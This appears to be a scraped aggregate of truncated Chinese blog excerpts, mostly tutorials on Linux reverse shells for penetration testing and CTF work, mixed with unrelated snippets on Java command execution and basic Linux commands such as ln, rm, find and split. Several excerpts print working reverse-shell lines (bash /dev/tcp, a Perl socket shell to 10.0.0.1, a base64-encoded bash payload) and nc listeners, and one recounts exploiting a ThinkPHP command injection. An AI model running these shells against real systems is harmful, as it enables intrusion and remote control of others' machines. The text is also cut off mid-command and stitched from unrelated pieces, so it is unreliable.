本机开启监听: nc -lvnp 4444nc -vvlp 4444 目标机器开启反弹 bash版本: bash -i >& /dev/tcp/ >& perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))

零.绪论 背景: ThinkPHP框架的--> 找到一个OS命令注入(很简单的Burp可以直接扫出来的那种):页面配置系统默认网关处. 一.渗透过程 1.首先看了一下,没有回显. 2.用ceye.io看DNSlog发现不能连接外网. 3.内网ping ok!说明可以的,确实命令执行. 4.弹bash 最常见的监听端nc nc -p -l -v 二.下面开始弹bash: 1.最常见的bash的 bash -i >& /dev/tcp/a.b.c.d/ >& #没成功,尝试b

最近老是觉得自己白天工作累,晚上理应休息 堕落了几天才发觉自己真垃圾,加紧向前吧. 0x00 前言 在平时渗透还是工作中经常会遇到shell反弹的情况,网上一搜反弹shell都是一大堆,但是真正遇到反弹shell的时候你真的懂了反弹shell 的payload 的? 这篇会细致总结下常见反弹shell的情况(Linux)和反弹shell的本质. 0x01 Linux的文件描述符 linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通

1.Windows下执行cmd命令 如复制 D:\tmp\my.txt 到D:\tmp\my_by_only_cmd.txt 现文件如图示: 执行代码: private static void runWinCmd() throws IOException, InterruptedException { Process proc = Runtime.getRuntime().exec("cmd.exe /c copy D:\\tmp\\my.txt D:\\tmp\\my_by_only_cmd.

linux命令 - ln - 创建和删除软.硬链接 在Linux系统中,内核为每一个新创建的文件分配一个Inode(索引结点),每个文件都有一个惟一的inode号.文件属性保存在索引结点里,在访问文件时,索引结点被复制到内存在,从而实现文件的快速访问. 链接是一种在共享文件和访问它的用户的若干目录项之间建立联系的一种方法.Linux中包括两种链接:硬链接(Hard Link)和软链接(Soft Link),软链接又称为符号链接(Symbolic link).符号连接相当于Windows下的快捷方

[前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里shell由bash解析,有时候是由sh解析,不一定百发百中***在虚拟机里面试过可行,替换成自己的地址和端口即可******/dev/[tcp|upd]/host/port是Linux设备里面比较特殊的文件,读取或写入相当于建立socket调用******由于其特殊性,命令执行后依旧无法找到/dev/tcp目

01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali       192.168.253.128     反弹端    自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp|udp]/host/port是linux设备里面比较特殊的文件,读取或写入相当于建立socket调用*** ***参考文章及更多骚姿势*** 监

在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell. 1.bash反弹shell 本地开启监听 nc -lvvp 受害主机命令 bash -i >& /dev/tcp/ >& 收到反弹回来的shell 2. NC反弹shell 各个Linux发行版本虽然安装有netcat,但是有其具有反弹shell功能的参数 -e不能使用,我们需要下载安装netcat原生版. ## 下载 wget https://nchc.dl.s

    最近,一起做安全测试的兄弟问我:Linux反弹shell的命令是什么,我毫不犹豫地在笔记中找到发给了他,可是脑海中突然闪过有个疑问,为啥这样能反弹shell呢,用了那么多次却从来没有想过这个问题.这是一篇原理的介绍,也是给自己提的一个醒:盲目机械地工作着,没有多少思考的时间,在忙碌中已经找不到工作的本质和初心.     Linux反弹shell的指令如下: bash -i >& /dev/tcp/ip/port 0>&1   1 bash -i >& /d

目录 一.简介 二.命令 三.NetCat 一.简介 黑入服务器很少会是通过账号密码的方式进入,因为这很难破解密码和很多服务器都做了限制白名单. 大多是通过上传脚本文件,然后执行脚本开启一个端口,通过那个端口来执行shell命令去操作,这样会非常安全很难被察觉. 二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.于是决

转自:http://blog.sina.com.cn/s/blog_6433391301019bpn.html 在java程序中如何调用linux的命令?如何调用shell脚本呢? 这里不得不提到java的process类了. process这个类是一个抽象类,封装了一个进程(你在调用linux的命令或者shell脚本就是为了执行一个在linux下执行的程序,所以应该使用process类). process类提供了执行从进程输入,执行输出到进程,等待进程完成,检查进程的推出状态,以及shut d

Shell Shell是一个程序,用户输入的命令通过shell来传达给内核或其它程序.用户在linux打开一个终端,终端就会自动调用用户的shell. Linux上的Shell有很多种,用的最多是shell是bash, 全路径是 /bin/bash. 每个用户的shell可以不一样,具体配置放在 /etc/passwd文件种. Bash echo $PATH 显示linux的环境变量,$用来引用一个变量,bash执行命令的时候就是去PATH指定的路径种寻找的. export test="hell

0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点. nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 n参数高数netcat不要DNS反向查询IP的域名 z参数,连接成功后立即关闭连接 $ nc -v 172.31.100.7 21netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息. 使用nc聊天 $nc -l 156

Linux 反弹shell bash环境获取shell 客户端 nc -lvp 8888 服务器 bash -i >& /dev/tcp/ip/port 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' //base64版 在线编码地址 参考链接 cnblogs-Windows反弹shell方法总结 CSDN-Windo

参考:Linux命令大全 分割大文件 Split命令 按行分割(只能是文本文件) $split -l 1000 big_file 前缀 按文件大小分割 $split -b 64m big_file 前缀 文本合并 #a.txt a b c #b.txt 1 2 3 追加文本 $cat a.txt >> b.txt 结果: a b c 1 2 3 逐行合并 $ paste a.txt b.txt 结果 a 1 b 2 c 3 通过-d参数可以制定分隔符额 $paste -d: a.txt b.t

Ctrl+R快速搜索history Ctrl+P显示上一条命令 快速执行一条history命令:!!/!-number ========================================= 快速进入某些目录 键入cd-可直接进入用户的home目录: 键入cd-可进入上一个目录. export CDPATH=.:~:/etc:/usr/local mkdir -p /***/***/***/ alias cd3="cd ../../../" ================

Linux 目录结构及解释 查看命令行执行完位置:  echo $BASH 命令记录 mkdir mkdir命令 用来创建目录. 语法:mkdir (选项)(参数) 主要选项: -m<目标属性>或--mode<目标属性>建立目录的同时设置目录的权限: -p或--parents 若所要建立目录的上层目录目前尚未建立,则会一并建立上层目录: 参数: 指定要创建的目录列表,多个目录之间用空格隔开. 创建多层目录: mkdir a/b/c/d chmod chmod命令用来变更文件或目录的

方法一: find 目录 -name "*.abc" | xargs rm命令有点危险,可以先执行前半段,看看是不是你要删除的文件, 然后再整条执行 方法二:find . -name '*.exe' -type f -print -exec rm -rf {} \;(1) "."    表示从当前目录开始递归查找(2) “ -name '*.exe' "根据名称来查找,要查找所有以.exe结尾的文件夹或者文件(3) " -type f "

1.cat查看一个文件,linux默认bash 2.echo回显命令 3.ls 4.history历史记录,查看使用过的命令 5.根目录下文件目录 6.bin目录下内容多为应用程序和命令 7.boot下的文件和目录,grub下 8.dev设备文件目录 9.etc目录下配置文件 10.home个人文件目录 11.动态链接库目录lib 12.内存映射目录,里面为动态内容proc目录 13.其他目录

用户可以使用 rm 命令删除不需要的文件. rm 可以删除文件或目录,并且支持通配符. 如果目录中存在其它文件则会递归删除. 删除软链接只是删除链接,对应的文件或目录不会被删除. 软链接类似于 windows 系统中的快捷方式. 如果删除硬链接后文件存在其它的硬链接文件,内容任可以访问.使用 rm 命令一定要小心.文件一旦被删除不能恢复,为防止误删除文件,可以使用 -i 选项来进行提示. 命令格式: rm  [选项]  [参数] 参数: -r  -R -recursise  删除指定目录及目录下

我看过一篇博客,是有关随手记录一些常用的命令的.感觉对自己比较有价值,不过其他人读起来就比较费劲了,毕竟没有什么主线.各取所需吧各位~ 1.CentOS 查看和修改系统时间和时区 date #查看系统时间 #修改时间 // #将系统日期设定为2010年05月16日 :: #将系统时间设定为下午12:: clock -w #修改后,强制将时间写入COMS #修改时区 cp -f /usr/share/zoneinfo/Asia/Shanghai /etc/localtime #修改时区,将Asia